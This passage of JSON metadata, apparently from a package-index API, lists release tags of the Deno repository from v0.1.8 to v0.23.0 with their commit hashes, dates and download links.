a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v